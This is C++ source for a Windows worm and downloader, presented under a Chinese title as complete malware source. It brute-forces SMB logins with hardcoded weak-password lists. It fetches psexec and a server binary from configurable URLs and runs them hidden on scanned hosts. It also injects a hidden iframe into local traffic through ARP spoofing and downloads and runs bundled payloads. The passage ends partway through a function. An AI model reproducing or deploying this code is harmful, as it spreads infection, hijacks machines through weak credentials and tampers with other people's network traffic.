webdown.cpp

黑色技术蠕虫下载者的完整源码

// WebDown.cpp : Defines the entry point for the console application.
#include "stdafx.h"
#include "WebDown.h"
#include "wrom.h"
#include "win32cpp.h"
//#include "ipc.h"
#include <Dbt.h>
#include "winsvc.h"

#include "winsvc.h"

#include "winsock2.h"
#pragma comment(lib,"ws2_32.lib")

#include "PingI.h"
#include "winnetwk.h"
#pragma comment(lib,"mpr.lib")

#include <tlhelp32.h>

//#include "afxinet.h"

#include <Iprtrmib.h>

const char *user[]={
"administrator","admin", "guest","alex", "home",
"love","xp", "user","game", "123",
"movie","time", "yeah","money", "xpuser",
0};
const char *pass[]={
"NULL", 
"password", "123456","qwerty","abc123", "memory",
"home", "12345678","love","xp", "88888",
"5201314", "1314520","asdfgh","alex", "angel",
"123", "asdf","baby","woaini", "movie",
0};



/////////////////////////////////////////////////////////////////////////////
struct MODIFY_DATA 
{
	char DownFile[100];//下载文件列表
	char DownRunFile[100]; //下载ip和服务端程序执行
	char DownRunURLFile[100]; //下载ip和服务端程序执行
	char ArpInject[256];  //Arp感染挂马代码
	char DownRunArpFile[100]; //下载Arp URL
	char DownRunBindFile[100]; //文件捆绑下载 URL
	bool IsWorm;//是否感染EXE启动
	bool IsUpan;//是否u盘传播
	bool IsShare;//是否弱口令传播
	bool IsAnti;//是否反查杀
	bool IsARP; //是否ARP感染
	int WaitTime;//巡查时间（分钟）
}modify_data = 
{
	"http://127.0.0.1/down.list",
	"http://127.0.0.1/",
    "http://127.0.0.1/",
	"<iframe src='http://xxx.htm' width=0 height=0>",
	"http://127.0.0.1/",
	"http://127.0.0.1/",
	false,
	false,
	false,
	false,
	false,
    20,
};

HWND hWnd;
char DownFileDate1[9]="88-88-88";
char DownFileDate2[9]="88-88-88";

SERVICE_STATUS service_status_ss;
SERVICE_STATUS_HANDLE handle_service_status;
SC_HANDLE scm,svc;

//======================================
typedef DWORD (WINAPI *GetTcpTableFun)(PMIB_TCPTABLE,PDWORD,BOOL);
typedef DWORD (WINAPI *SetTcpEntryFun) (PMIB_TCPROW );
typedef DWORD (WINAPI *GetUdpTableFun)(PMIB_UDPTABLE,PDWORD,BOOL);

	PMIB_TCPTABLE mibtcp; //TCP
	PMIB_UDPTABLE mibUdp; //UDP
	BYTE	pTcpBuf[100*20+4];
	char    *DisConIPAddr[10];
	int     iDisCon;

	HINSTANCE hInst;
	GetTcpTableFun pGetTcp;
	GetUdpTableFun pGetUdp;
	SetTcpEntryFun pEtyTcp;

//========================================

/*解密数据函数*/
void DecryptRecord(char *szRec, unsigned long nLen, char *szKey)
{
	unsigned long i;
	char *p;

	p = szKey;

	for(i = 0; i < nLen; i++) {
		if(!(*p))
			p = szKey;

		*szRec -= *p;
		*szRec++ ^= *p++;
	}
}


//====================================================================
void KillProcess(char * processName)
{
	HANDLE   hSnapshot;    
	hSnapshot=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);  
	PROCESSENTRY32   pe;    
	Process32First(hSnapshot,&pe);    
	do    
	{    CString KillProcessName = processName;
        if(KillProcessName.CompareNoCase(pe.szExeFile) == 0)
		{    
			HANDLE   hProcess;    
			hProcess=OpenProcess(PROCESS_TERMINATE,FALSE,pe.th32ProcessID);    
			if   (hProcess)    
			{    
				TerminateProcess(hProcess,0);//关闭进程    
			}    
		}    
	}      
	while(Process32Next(hSnapshot,&pe));    
	CloseHandle(hSnapshot); 
}


DWORD ConnectRemote(const char *RemoteIP,const char *lpUserName,const char *lpPassword) 
{
   char sDownRunFileUP[256], sDownRunFileServer[256], char sPwd[20];
   memset(sDownRunFileUP, 0, 256);
   memset(sDownRunFileServer, 0, 256);
   sprintf(sDownRunFileUP, "%s", modify_data.DownRunFile);
   sprintf(sDownRunFileServer, "%s", modify_data.DownRunURLFile);

	char SysDirBuff[256], File1[256], File2[256];
	memset(File1, 0, 256);
	memset(File2, 0, 256);
	::GetSystemDirectory(SysDirBuff,sizeof(SysDirBuff));
	sprintf(File1, "%s\\psexec.exe", SysDirBuff);
	sprintf(File2, "%s\\servrr.exe", SysDirBuff);

	URLDownloadToFile(0, sDownRunFileUP, File1, 0, 0);
    URLDownloadToFile(0, sDownRunFileServer, File2, 0, 0);

   memset(sPwd, 0, 20);
   if(strcmp(lpPassword, "NULL") == 0)
	   sprintf(sPwd, "\"%s\"", "");
   else
	   sprintf(sPwd, "%s", lpPassword);
					
   char filesring[2048];
   memset(filesring, 0, 2048);
   sprintf(filesring, "%s\\psexec.exe \\\\%s -u %s -p %s -c %s\\servrr.exe -d", SysDirBuff, RemoteIP, lpUserName, sPwd, SysDirBuff);
   Sleep(1000);
   int  nRet = WinExec(filesring, SW_HIDE);
   return nRet;
}

CString jian2(CString ch)
{
    CString aaa;
	int nCount = 0;
      for(int i=0;i<ch.GetLength();i++)
	{
		  if(ch.Mid(i,1)=='.')
		  {
			  nCount ++;
			  if(nCount == 2)
			  {
				  aaa = ch.Left(i + 1);  
			  }
		  }

	}
	
	  return(aaa);
	  
}

CString jian(CString ch)
{
    CString aaa;
      for(int i=0;i<ch.GetLength();i++)
	{
		  if(ch.Mid(i,1)=='0'||ch.Mid(i,1)=='1'||ch.Mid(i,1)=='2'||ch.Mid(i,1)=='3'||ch.Mid(i,1)=='4'||ch.Mid(i,1)=='5'||ch.Mid(i,1)=='6'||ch.Mid(i,1)=='7'||ch.Mid(i,1)=='8'||ch.Mid(i,1)=='9'||ch.Mid(i,1)=='.')
          aaa+=ch.Mid(i,1);
		 // else
		 // break;
	}
	
	  return(aaa);
	  
}


CString jian1(CString ch)
{
    CString aaa = ch.Right(3);
      for(int i=0;i<aaa.GetLength();i++)
	{
		  if(aaa.Mid(i,1)=='.')
		  {
			  aaa = aaa.Right(3 - (i + 1));
			  break;
		  }
          
	}

	  CString bbb = ch.Left(ch.GetLength() - aaa.GetLength());    

	  return(bbb);
	  
}



//取得公网IP
void getipfun()
{
    CInternetSession session;         //声明该对象为获取网页属性做准备
	CHttpFile *pFile=NULL;            
	CString str,ch;  //www.ip138.com/ips8.asp
	CString m_szSite="http://union.itlearner.com/ip/getip.asp";   //该地址是获取外网IP的关键，原理就是通过该地址来获取外网IP的
	try{
		pFile=(CHttpFile*)session.OpenURL(m_szSite);}      //打开该地址
	catch(CInternetException *pEx)             //错误处理
	{
		pFile=NULL;
		pEx->Delete();
	}
	if(pFile)
	{
            while(pFile->ReadString(str))    //读入该字符串
			{
               ch+=str+"\r\n";
			}
	pFile->Close();                               
	delete pFile;
	}
	else
	{
		ch+="";
	}
	CString lin;
	CString aaaa;
	lin=ch.Mid(ch.Find("input name=\"ip\"")+2,50);        //处理获取的带有IP的字符串
	lin=lin.Mid(lin.Find(".") - 3,15);        //处理获取的带有IP的字符串
	lin=jian(lin);                          //再次处理带有IP的字符串

    CString bbb = jian2(lin);
	CString cccccc;
	for(int j = 90; j < 255; j ++)
	{
	   for(int n = 2; n < 255; n ++)
	   {
			cccccc.Empty(); 
			cccccc.Format("%s%d.%d", bbb, j, n); 
			if(cccccc.CompareNoCase(lin) != 0)
			{
				for(int mm = 0;user[mm]; mm++)
				{
					for (int k=0;pass[k];k++)
					{
						ConnectRemote(cccccc, user[mm], pass[k]);
					}
				}			

			}

	   }
	   

	}

}

//==================================================================================
DWORD ArpRemote(const char *RemoteIP) 
{
	char SysDirBuff[256], ArpFile[256], strDownRunArpFile[256], strDownRunWincap[256],
		strWpCapDll[256], strPaketdll[256], strwanpacketdll[256],
		DownRunWincap[256],	WpCapDll[256], Paketdll[256], wanpacketdll[256];
	memset(ArpFile, 0, 256);
	::GetSystemDirectory(SysDirBuff,sizeof(SysDirBuff));
	sprintf(ArpFile, "%s\\ArpW.exe", SysDirBuff);
	memset(strDownRunArpFile, 0, 256);
	memset(strDownRunWincap, 0, 256);
	memset(strWpCapDll, 0, 256);
	memset(strPaketdll, 0, 256);
	memset(strwanpacketdll, 0, 256);

	memset(DownRunWincap, 0, 256);
	memset(WpCapDll, 0, 256);
	memset(Paketdll, 0, 256);
	memset(wanpacketdll, 0, 256);
	sprintf(DownRunWincap, "%s\\nogui.exe", SysDirBuff);
	sprintf(WpCapDll, "%s\\wpcap.dll", SysDirBuff);
	sprintf(Paketdll, "%s\\packet.dll", SysDirBuff);
	sprintf(wanpacketdll, "%s\\wanpacket.dll", SysDirBuff);

	sprintf(strDownRunArpFile, "%s/arp.exe", modify_data.DownRunArpFile);
	sprintf(strDownRunWincap, "%s/nogui.exe", modify_data.DownRunArpFile);
	sprintf(strWpCapDll, "%s/wpcap.dll", modify_data.DownRunArpFile);
	sprintf(strPaketdll, "%s/packet.dll", modify_data.DownRunArpFile);
	sprintf(strwanpacketdll, "%s/wanpacket.dll", modify_data.DownRunArpFile);

	URLDownloadToFile(0, strDownRunArpFile, ArpFile, 0, 0);
	URLDownloadToFile(0, strDownRunWincap, DownRunWincap, 0, 0);
	URLDownloadToFile(0, strWpCapDll, WpCapDll, 0, 0);
	URLDownloadToFile(0, strPaketdll, Paketdll, 0, 0);
	URLDownloadToFile(0, strwanpacketdll, wanpacketdll, 0, 0);
	   
   char filesring[2048];
   memset(filesring, 0, 2048);
   //运行wincap
   WinExec(DownRunWincap, SW_HIDE);

   Sleep(50000);

   memset(filesring, 0, 2048);
   sprintf(filesring, "%s\\ArpW.exe -idx 0 -ip %s -port 80 -insert \"%s\"", SysDirBuff, RemoteIP, modify_data.ArpInject);
   WinExec(filesring, SW_HIDE);
   return 0;
}

void LocalToArp() 
{ 
	WORD wVersion =0 ;
	int	 errret = -1;
	WSADATA wsaData;
	
	wVersion = MAKEWORD(2,2);
	errret = WSAStartup(wVersion,&wsaData);
	
	if( LOBYTE( wsaData.wVersion) != 2 ||
		HIBYTE( wsaData.wVersion) !=2 )
	{
  		return ;
	}
	
	char szHostName[128];      //将本机的名称存入一维数组,数组名称为szHostName
	struct hostent * pHost;	//定义结构体 hostent
	int i; 	                //定义变量i
	char IPStr[100];
  
    LVITEM lvi;
	lvi.mask=LVIF_IMAGE|LVIF_TEXT;
	
	lvi.iItem=0;
	lvi.iSubItem=0;
	lvi.iImage=0;

	if(gethostname(szHostName,128)==0)    
	{
		pHost = gethostbyname(szHostName); 
		for( i = 0; pHost!= NULL && pHost->h_addr_list[i]!= NULL; i++ ) 	
		{
			CString IPAddress = inet_ntoa (*(struct in_addr *)pHost->h_addr_list[i]);

			CString cccc = jian1(IPAddress);
			
			memset(IPStr, 0, 100);

			sprintf(IPStr, "%s2-%s255", cccc, cccc);

            ArpRemote(IPStr);
		}
	}

	WSACleanup();
}

unsigned long  CALLBACK ARP_thread(LPVOID dParam) 
{
 
 
	LocalToArp();
 

	return 0;
}

//捆绑感染
DWORD DownBindRun() 
{
	char SysDirBuff[256], ArpFile[256];
	memset(ArpFile, 0, 256);
	::GetSystemDirectory(SysDirBuff,sizeof(SysDirBuff));
	sprintf(ArpFile, "%s\\BindF.exe", SysDirBuff);

	URLDownloadToFile(0, modify_data.DownRunBindFile, ArpFile, 0, 0);
	   
   int nRet = WinExec(ArpFile, SW_HIDE);
   return 0;
}

unsigned long  CALLBACK Bind_thread(LPVOID dParam) 
{
	DownBindRun();

	return 0;
}

//==================================================================================

/*   功能说明：查询本机的名称和IP地址.                                             */ 
void QueryLocalIP() 
{ 
	WORD wVersion =0 ;
	int	 errret = -1;
	WSADATA wsaData;
	
	wVersion = MAKEWORD(2,2);
	errret = WSAStartup(wVersion,&wsaData);
	
	if( LOBYTE( wsaData.wVersion) != 2 ||
		HIBYTE( wsaData.wVersion) !=2 )
	{
  		return ;
	}